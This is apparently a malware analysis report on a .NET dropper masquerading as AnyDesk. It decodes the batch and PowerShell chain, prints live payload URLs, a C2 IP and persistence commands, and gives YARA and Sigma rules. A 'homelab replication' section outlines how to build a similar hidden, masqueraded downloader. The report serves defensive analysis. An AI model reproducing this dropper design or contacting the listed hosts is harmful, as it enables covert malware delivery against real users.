2232eb680881fa7bc2e9402cfedbbf416ff065426cb5309bb0c9ce8224632cd2unclassified-batch-powershell-dropper: 2232eb68 — AnyDesk-masquerade .NET batch dropper with PhantomGate loader and IPFS/paste C2
Executive Summary
A 32 KB .NET Framework PE32 executable masquerading as AnyDesk 9.6.11. The binary embeds a complete DOS batch script in its .text section that expands 60 SET variables into a UTF-16LE Base64-encoded PowerShell command. The PowerShell pins TLS 1.2, downloads a .NET assembly from an IPFS mirror or a Norwegian paste site, and reflectively loads it via a PhantomGate bootstrap class into myprogram.Homees.runss. Persistence is achieved by copying the batch to C:\ProgramData\khcrdab.bat. The builder shows the same myprogram.Homees type name and runss entry method observed across the unclassified-batch-powershell-dropper and unclassified-js-bitbucket-stego-dropper families, confirming this is a new morph of an established commodity builder rather than an isolated sample.
What It Is
- SHA-256:
2232eb680881fa7bc2e9402cfedbbf416ff065426cb5309bb0c9ce8224632cd2^[metadata.json] - Filename:
10784_30601_10_PDF.exe(invoice/PDF masquerade, double-extension risk) ^[triage.json] - File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, 3 sections ^[file.txt]
- Size: 32,768 bytes ^[triage.json]
- Linker: .NET Framework v4.0.30319 (C# Roslyn / Visual Studio 2022-era IL) ^[strings.txt:5]
- Compilation timestamp: Thu May 28 11:15:01 2026 UTC ^[pefile.txt:34]
- Signed: No ^[rabin2-info.txt:27]
- Version info masquerade: AnyDesk Software GmbH, FileDescription "AnyDesk", FileVersion "9.6.11" ^[exiftool.json:36-38] ^[pefile.txt:222-227]
- SSDeep:
768:yz57Ngy0RKX/bFXnwwKsuGgReSUaq1LyJQz:8/bNnwfsuGyda^[ssdeep.txt]
Family attribution: Tier 1 variant of the unclassified-batch-powershell-dropper cluster. Same SET/GOTO variable-expansion obfuscation, same paste-site/IPFS download chain, same myprogram.Homees.runss reflective invocation, but adds a professionally crafted AnyDesk version-info masquerade and a new RegAsm masquerade string (replacing the older MsBuild string). ^[entities/unclassified-batch-powershell-dropper.md]
How It Works
Stage 1: .NET PE32 wrapper
The binary is a standard C# console/GUI PE32 compiled to .NET Framework 4.0. Its entry point is Program.Main at 0x0040206c ^[rabin2-info.txt:11] ^[r2:entry0]. The .text section contains the batch payload as a string literal; the .rsrc section holds a 7-icon AnyDesk icon group and a VS_VERSIONINFO block cloned from legitimate AnyDesk metadata. ^[binwalk.txt:5] ^[pefile.txt:211-239]
Stage 2: Batch expansion
At runtime, the C# executable writes the batch script to a temporary location and launches it via ProcessStartInfo with WindowStyle.Hidden and CreateNoWindow=true. ^[capa.txt:29-34] The batch script uses 60 SET variables with random 8–10 character uppercase names (e.g., NOHONJGDHD, FOJDFGFFHD, HSJNGGJDDN) concatenated via %var% interpolation into a single command line. ^[strings.txt:119-335]
Stage 3: PowerShell decode
The concatenated string is Base64-decoded into a UTF-16LE PowerShell script. The script performs:
Start-Sleep -Seconds 3— simple anti-sandbox delay. ^[decoded payload]- TLS 1.2 pinning:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Defines
PhantomGate.LoadAssembly(byte[])— a trivialAppDomain.CurrentDomain.Load()wrapper. ^[decoded payload] - Defines
d($l)— failover downloader usingNet.WebClientwithGet-RandomURL selection from an array$k. ^[decoded payload] - Defines
i($a,$t,$m,$p)— reflective assembly invoke: loads the bytes, resolves type by full name, resolves method by name + binding flags, creates instance if non-static, and invokes. ^[decoded payload]
Stage 4: C2 download
The URL array $k contains two failover endpoints:
https://arbitrary-chocolate-tiglon.myfilebase.com/ipfs/QmNaXFQZwK4XA3P94A8ug5gte97BQr8UuA87JeDAPKVCdK— IPFS-hosted payload via MyFileBase gateway.https://paste.sensio.no/TripletsMechanic— Norwegian paste-site payload. ^[decoded payload]
The downloader fetches the payload, extracts a Base64 blob between <<START>> and <<END>> markers, decodes it, and passes it to i() along with the arguments:
i ([Convert]::FromBase64String($Matches[1])) 'myprogram.Homees' 'runss' @($gg, '1', 'khcrdab', 'RegAsm', '0', 'x86')
The $gg argument is a reversed-string URL: txt.iahegFS/20/42.68.38.301//:gsffsfsd with the last 8 characters stripped, then reversed, yielding ://103.83.86.24/02/SFgehai.txt (an HTTP endpoint on a Chinese-registered IP). ^[decoded payload]
Stage 5: Persistence
After launching the assembly, the PowerShell copies the original batch file to C:\ProgramData\khcrdab.bat via Copy-Item -Path '%~f0' -Destination 'C:\ProgramData\khcrdab.bat' -Force -ErrorAction SilentlyContinue. ^[decoded payload]
Decompiled Behavior
Ghidra analysis on CIL binaries yields minimal useful pseudo-C; radare2 confirms the entry point is Program.Main at 0x0040206c and identifies 51 functions total, most of them compiler-generated .cctor and LINQ closure methods (<Main>b__0_0 through <Main>b__0_11, ComputeSum, ComputeWeirdMetric). ^[r2:fcn.0040206c] ^[strings.txt:7-40] The actual malicious logic is not in the C# code itself but in the embedded batch string, making static decompilation of limited value. The capa fingerprint confirms .NET compilation, process creation with hidden window, file write, file delete, and console buffer manipulation — all consistent with a batch-executor wrapper. ^[capa.txt]
C2 Infrastructure
| IOC | Type | Evidence |
|---|---|---|
https://arbitrary-chocolate-tiglon.myfilebase.com/ipfs/QmNaXFQZwK4XA3P94A8ug5gte97BQr8UuA87JeDAPKVCdK |
IPFS payload mirror | Decoded PowerShell |
https://paste.sensio.no/TripletsMechanic |
Paste-site payload | Decoded PowerShell |
103.83.86.24 |
Second-stage IP (reversed-string decode) | Decoded PowerShell |
C:\ProgramData\khcrdab.bat |
Persistence file path | Decoded PowerShell |
PhantomGate |
.NET bootstrap class name | Decoded PowerShell |
myprogram.Homees |
.NET payload type name | Decoded PowerShell |
runss |
.NET payload entry method | Decoded PowerShell |
RegAsm |
Masquerade string passed to payload | Decoded PowerShell |
No hardcoded mutex, named pipe, or registry key was recovered. The C2 is entirely URL-based and depends on the paste sites remaining live.
Interesting Tidbits
- AnyDesk masquerade is complete: The PE carries the full AnyDesk VS_VERSIONINFO (CompanyName, FileDescription, FileVersion 9.6.11, ProductName, LegalCopyright) and a 7-icon RT_ICON group. The legitimate AnyDesk binary is much larger (~4 MB+); this 32 KB impostor will stand out to any size-aware triage. ^[pefile.txt:222] ^[binwalk.txt:5]
- Fresh compile: Build timestamp
May 28 2026 11:15:01 UTCmatches the MalwareBazaar ingestion time (May 28 2026 16:01 UTC). This was built and uploaded within ~5 hours. ^[pefile.txt:34] ^[exiftool.json:7] - PhantomGate class: The inner PowerShell defines
PhantomGate.LoadAssembly()— a new class name not observed in prior siblings of this cluster, which used raw[Reflection.Assembly]::Load. The builder is evolving. ^[decoded payload] - RegAsm replaces MsBuild: Earlier Tier-1 siblings passed
MsBuildas the masquerade string. This morph passesRegAsm, another trusted developer utility. The string is likely used for process-name masquerade or file-write path selection inside the inner payload. ^[decoded payload] - IPFS as CDN: Use of
myfilebase.com(a public IPFS gateway) for payload hosting is a cheap, abuse-resistant hosting layer. The gateway domain resolves the content via the immutable IPFS hashQmNaXFQZwK4XA3P94A8ug5gte97BQr8UuA87JeDAPKVCdK. ^[decoded payload] - Reversed-string URL: The second-stage URL
103.83.86.24is encoded as a reversed string with an 8-character junk suffix. This anti-static technique was also observed in theeda47a53sibling (sostsenrer2reversed GitLab URL). ^[decoded payload] - Floss failure: flare-floss exited with an argument error (
--noflag collision), so no decoded strings were recovered automatically. Manual batch reconstruction was required. ^[floss.txt]
How To Mess With It (Homelab Replication)
Goal: Reproduce a .NET PE32 that embeds a batch script, expands it via ProcessStartInfo with hidden window, and executes a PowerShell payload.
Toolchain:
- Visual Studio 2022 Community or
dotnet new console -f net48 - C# target:
net48(produces the samev4.0.30319metadata)
Steps:
- Write a C# console app that reads a batch script from an embedded resource or string literal.
- Use
ProcessStartInfowithWindowStyle = ProcessWindowStyle.Hidden,CreateNoWindow = true, andUseShellExecute = false. - Write the batch to
%TEMP%\anydesk_update.batand launchcmd.exe /con it. - The batch script should use
SETvariables +%var%concatenation to assemble apowershell.exe -WindowStyle Hidden -Command "..."line. - The PowerShell command Base64-encodes a UTF-16LE script that downloads a payload and reflectively loads it.
- Add VS_VERSIONINFO with AnyDesk (or other legitimate software) metadata and a borrowed icon group to complete the masquerade.
Verification: Run capa on the reproducer; it should hit the same .NET + create process + write file + delete file capabilities. Compare pefile output to verify 3-section PE32 with .text, .reloc, .rsrc.
Deployable Signatures
YARA Rule
rule Unclassified_Batch_PowerShell_Dropper_AnyDesk_Masquerade {
meta:
description = "Detects .NET PE32 embedding batch script with AnyDesk version masquerade"
author = "PacketPursuit"
date = "2026-08-13"
hash = "2232eb680881fa7bc2e9402cfedbbf416ff065426cb5309bb0c9ce8224632cd2"
family = "unclassified-batch-powershell-dropper"
strings:
$anydesk_company = "AnyDesk Software GmbH" wide ascii
$anydesk_desc = "AnyDesk" wide ascii
$anydesk_version = "9.6.11" wide ascii
$batch_echo = "@echo off" ascii
$batch_goto = "GOTO " ascii
$batch_set = "SET " ascii
$concat_marker = /%[A-Z]{8,10}%/ ascii
$ps_b64prefix = "powershell.exe -WindowStyle Hidden" ascii
$phantomgate = "PhantomGate" ascii
$homees = "myprogram.Homees" ascii
condition:
uint16(0) == 0x5A4D and
($anydesk_company or $anydesk_desc) and
($batch_echo or $batch_goto or $batch_set) and
($concat_marker or $ps_b64prefix or $phantomgate or $homees) and
filesize < 100KB
}
Sigma Rule
title: AnyDesk Masquerade Batch Dropper Execution
description: Detects the execution pattern of the 2232eb68 dropper — hidden cmd/powershell spawned by a small .NET PE with AnyDesk metadata, followed by network to paste/IPFS sites.
logsource:
category: process_creation
product: windows
detection:
selection_pe:
- Image|contains: 'AnyDesk'
- CommandLine|contains:
- 'khcrdab'
- 'PhantomGate'
- 'myprogram.Homees'
selection_network:
- DestinationHostname|contains:
- 'myfilebase.com'
- 'paste.sensio.no'
- DestinationIp|contains: '103.83.86.24'
selection_persistence:
TargetFilename|contains: 'C:\\ProgramData\\khcrdab.bat'
condition: selection_pe or selection_network or selection_persistence
falsepositives:
- Unlikely; the `khcrdab` filename and `myprogram.Homees` type name are unique to this crimeware builder.
level: high
IOC List
| IOC | Type | Context |
|---|---|---|
2232eb680881fa7bc2e9402cfedbbf416ff065426cb5309bb0c9ce8224632cd2 |
SHA-256 | Dropper PE32 |
10784_30601_10_PDF.exe |
Filename | Invoice masquerade |
C:\ProgramData\khcrdab.bat |
File path | Persistence copy |
arbitrary-chocolate-tiglon.myfilebase.com |
Domain | IPFS payload gateway |
paste.sensio.no |
Domain | Paste-site payload host |
103.83.86.24 |
IP | Second-stage C2 (reversed-string decode) |
PhantomGate |
Class name | .NET reflective loader bootstrap |
myprogram.Homees |
Type name | .NET payload entry class |
runss |
Method name | .NET payload entry method |
RegAsm |
String | Masquerade argument passed to payload |
Behavioral Fingerprint
This binary is a 32 KB .NET Framework PE32 with cloned AnyDesk version metadata and icon group. At runtime it drops and executes a hidden-window batch script that assembles 60 SET variables into a Base64-encoded PowerShell command. The PowerShell pins TLS 1.2, attempts to download a .NET assembly from an IPFS mirror or Norwegian paste site (failover), extracts a Base64 blob between <<START>>/<<END>> delimiters, and reflectively loads it via a PhantomGate bootstrap into myprogram.Homees.runss with a reversed-string C2 URL and a RegAsm masquerade string. Post-execution, it copies the batch file to C:\ProgramData\khcrdab.bat for persistence. The builder shares the myprogram.Homees type name and runss method with the unclassified-batch-powershell-dropper and unclassified-js-bitbucket-stego-dropper clusters.
Detection Signatures
| Capability | Namespace | ATT&CK Mapping |
|---|---|---|
| manipulate console buffer | host-interaction/console | T1059.003 |
| delete file | host-interaction/file-system/delete | T1070.004 |
| write file in .NET | host-interaction/file-system/write | T1105 |
| create a process with modified I/O handles and window | host-interaction/process/create | T1059.003, T1059.001 |
| create process in .NET | host-interaction/process/create | T1059.003 |
| terminate process | host-interaction/process/terminate | T1059.003 |
| compiled to the .NET platform | runtime/dotnet | — |
Additional ATT&CK mappings based on decoded payload:
- T1059.001 (PowerShell) — inline nested script with hidden window.
- T1059.003 (Windows Command Shell) — batch script parent.
- T1105 (Ingress Tool Transfer) — paste-site/IPFS download.
- T1620 (Reflective Code Loading) —
[Reflection.Assembly]::LoadviaPhantomGate. - T1127.001 (Trusted Developer Utilities Proxy Execution: MSBuild) — masquerade string variant (
RegAsminstead ofMsBuild); see msbuild-proxy-execution. - T1027.010 (Obfuscated Files or Information) — Base64 + reversed-string URL + batch variable expansion.
References
- MITRE ATT&CK T1059.001: https://attack.mitre.org/techniques/T1059/001/
- MITRE ATT&CK T1059.003: https://attack.mitre.org/techniques/T1059/003/
- MITRE ATT&CK T1105: https://attack.mitre.org/techniques/T1105/
- MITRE ATT&CK T1620: https://attack.mitre.org/techniques/T1620/
- MITRE ATT&CK T1127.001: https://attack.mitre.org/techniques/T1127/001/
- MITRE ATT&CK T1027.010: https://attack.mitre.org/techniques/T1027/010/
- Entity page: unclassified-batch-powershell-dropper
- Technique page: version-info-masquerade
- Procedure page: msbuild-proxy-execution
- Related cluster: unclassified-js-bitbucket-stego-dropper
Provenance
Analysis based on static artifacts only (CAPE skipped — no Windows guest available). Source files: file.txt, exiftool.json, pefile.txt, strings.txt, floss.txt, capa.txt, binwalk.txt, rabin2-info.txt, metadata.json, triage.json. Decoded PowerShell payload reconstructed manually from 60 SET variable fragments in strings.txt via Base64 → UTF-16LE decode. Radare2 analysis run at level 2 on CIL binary. No dynamic execution observed; all C2 IOCs recovered from static batch reconstruction.